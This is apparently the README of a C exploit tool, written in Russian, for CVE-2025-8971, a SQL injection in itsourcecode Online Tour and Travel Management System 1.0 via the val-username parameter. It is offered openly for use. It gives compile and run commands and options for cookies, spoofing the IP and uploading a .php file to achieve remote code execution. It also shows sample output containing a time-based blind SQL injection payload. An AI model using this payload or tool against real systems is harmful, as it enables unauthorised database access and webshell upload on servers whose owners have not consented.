
SQL-инъекция в itsourcecode Online Tour and Travel Management System 1.0.
Автор: Byte Reaper
Этот эксплойт для CVE-2025-8971, уязвимости SQL-инъекции в itsourcecode Online Tour and Travel Management System 1.0. Уязвимость существует в /admin/operations/travellers.php и может быть эксплуатации удаленно через параметр val-username.
Как это работает
Эксплойт отправляет специально сформированные HTTP POST запросы на целевой URL.
Полезные нагрузки кодируются и внедряются в val-username.
Опциональная загрузка файла (.php или изображение) может быть использована для достижения удаленного выполнения кода.
Скрипт проверяет ответы, чтобы убедиться, что полезная нагрузка была успешно выполнена.
GCC compiler (gcc)
Linux x86_64
ibcurl
gcc script.c argparse.c -o CVE-2025-8971 -lcurl
./CVE-2025-8971 -u http://<target> -v [verbose mode]
-h, --help сообщение помощи
-u, --url Целевой URL (Базовый URL)
-c, --cookies Файл cookie
-i, --ip Поддельный IP (запрос хоста)
-f, --file Загрузка файла (.php / изображение)
-v, --verbose Подробный режим
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
Лицензия MIT